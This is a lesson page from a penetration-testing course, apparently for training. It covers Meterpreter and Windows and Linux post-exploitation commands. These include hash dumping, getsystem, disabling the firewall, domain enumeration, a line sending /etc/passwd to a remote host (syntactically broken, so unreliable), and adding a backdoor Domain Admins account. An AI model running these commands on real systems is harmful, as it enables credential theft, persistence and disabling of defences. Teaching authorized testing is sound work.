Shopping Cart

No products in the cart.

Cover6 Solutions
Back to Course

#PentesterPrep

0% Complete
0/0 Steps
  1. Home Lab Setup
  2. Passive Information Gathering
  3. Active Information Gathering
  4. Wireshark Fundamentals
  5. IPv6 Overview
  6. Vulnerability Identification & Analysis
  7. Common Services, Threats & Attacks
  8. Exploitation
  9. Post-Exploitation
  10. The Metasploit Framework
  11. Privilege Escalation Techniques
  12. Password Attacks
  13. Antivirus & Firewall Evasion
  14. Pivoting
  15. Wireless Testing
  16. Intro to Web Exploitation
  17. Buffer Overflows
  18. Capture the Flag (CTF)

Participants 2973

    Show more
    #PentesterPrep Post-Exploitation
    Lesson 9 of 18
    In Progress

    Post-Exploitation

    cover6 November 9, 2019

    Meterpreter

    Meterpreter is an advanced payload that is part of the Metasploit Framework. It uses a reverse shell to create a connection back to the attacking machine. Meterpreter resides completely in the memory of a target machine and writes nothing to disk. It also does not spawn any new processes but rather injects itself into an existing process. It communicates over an encrypted channel and offers the attacker several useful pentesting features including a command shell, the ability to run executables, file send/receive, and network profiling.

    Assuming you have a meterpreter shell on a windows host, you can use the following commands:

    meterpreter > getsystem
    meterpreter > getuid
    meterpreter > run winenum
    meterpreter > sysinfo
    meterpreter > ipconfig
    meterpreter > run get_local_subnet
    meterpreter > enumdesktops
    meterpreter > webcam_list
    meterpreter > run post/windows/gather/smart_hashdump
    meterpreter > run post/windows/gather/enum_applications
    meterpreter > run post/windows/gather/enum_logged_on_users
    meterpreter > run post/windows/gather/enum_shares
    meterpreter > run post/windows/gather/checkvm
    meterpreter > background

    Upon exploitation of a Linux host, the screen may be blank but from here you can input your standard Linux post-exploitation commands.

    # ifconfig
    # whoami
    # netstat -antp
    # cat /etc/passwd >> root@10.0.1.21:/root

    Firewalls

    C:> netsh advfirewall show rule name=all
    C:> netsh advfirewall set allprofile state off
    C:> netsh advfirewall set allprofile state on

    Domain Enumeration

    The following commands, with the proper privileges, allow for Windows domain enumeration.

    C:> net users
    C:> net user  /domain
    C:> net user  
    C:> net users /domain
    C:> net groups /domain
    C:> net groups “Domain Admins” /domain

    Adding a user to the Domain

    Upon successfully enumerating the system/network and acquiring domain administrator privileges it is now time to add the user Cover6 with the password Cover6#C6S to the network/domain. The command to do this from a Windows host is:

    C:> net user Cover6 Cover6#C6S /ADD /DOMAIN

    Adding a user to the Domain Admins group

    Upon successfully adding the user Cover6 to the domain, it is now time to add the user to the Domain Admins group. The command to do this from a Windows prompt is:

    C:> net group “Domain Admins” Cover6 /ADD /DOMAIN